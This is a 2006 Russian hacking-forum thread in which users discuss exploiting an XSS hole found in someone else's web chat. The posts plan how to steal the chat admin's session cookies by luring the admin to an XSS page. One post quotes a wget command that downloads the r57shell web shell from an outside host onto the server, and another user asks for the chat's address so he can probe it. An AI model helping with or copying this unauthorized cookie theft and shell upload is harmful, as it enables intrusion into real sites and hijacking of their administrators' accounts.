Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.05.2006, 19:44
|
|
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031
Репутация:
71
|
|
Java Script Including ??
Привет всем нашол дыру в чате мона вставлять java script самое интересное я всегда почти дыры нахожу ))) Но вот юзать их я не умею что подскажите ? Сервер Апач 2.11 помойму система Win nt И вообще что можно вставить с помошью жава скрипт ??? кроме чтение cookies ...????
|
|
|
31.05.2006, 19:47
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
гениальный пост
особенно название
пофигу какой версии апач стоит, пофигу какая ОС... с помощью джава скрипта ты как нистранно, можешь много что сделать, на что соображалки хватит, то и делай. А вот кукисы ты благодаря снифферу "читаешь".. java script лишь проводник
|
|
|
|
31.05.2006, 20:01
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
У меня такая же проблема!!!! ПОМОГИТЕ!!! Короче я нашел vb-including. Т.е. я выполняю на системе vbscript :alert(); и он РАБОТАЕТ! Но когда я пытаюсь залить шелл vbscript :wget http://rst.void.ru/download/r57shell.txt -0 etoneshell.php он наверное ошибается и синтакс меняется! Как быть???
Люди плиз, иначе я красным писать начну! |
|
|
|
31.05.2006, 21:18
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Java Script Including. Долго я угорал над названия темы 
|
|
|
|
31.05.2006, 22:34
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
__________________
Никому нельзя верить...
|
|
|
|
31.05.2006, 22:36
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
drmist, ни в коем случае. Я согласен, что не раскрыл тему. Какой вопрос - таков ответ.
А ты молодец. Надеюсь создателю топика эти ссылки помогут.
|
|
|
|
01.06.2006, 21:32
|
|
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031
Репутация:
71
|
|
Привет вот собственно и я ))) Пасибо за ссылки )) конешшно )) но у меня вопрос такой
Можно как то пробраться на сервер с помощью жава скрипт ??? потому что только жава скрипт и html распазнаёт ( так вот только кукисы мона тырить получаеться ???
Ну раз никак с помощью java script нильзя то скажите как мона тырить cookie без использование ALERT ??? тоесть типа мышкой по картинке куки в лог ?
|
|
|
|
04.06.2006, 13:33
|
|
Новичок
Регистрация: 20.05.2006
Сообщений: 3
Провел на форуме:
2686
Репутация:
0
|
|
Если можна вставить java script то можна спырить админские кукисы...........
|
|
|
|
04.06.2006, 13:35
|
|
Новичок
Регистрация: 20.05.2006
Сообщений: 3
Провел на форуме:
2686
Репутация:
0
|
|
читай }{акер там по веб хаку дофига инфы.
Кста дай ссылку на етот чат, я его покалупаю маленько...
|
|
|
|
05.06.2006, 11:53
|
|
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031
Репутация:
71
|
|
КАк мона Стрырить Админские Кукисы ??? Заставить админа зайти на xss сраничку ? )))
Да он не дурак по ходу дела !
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
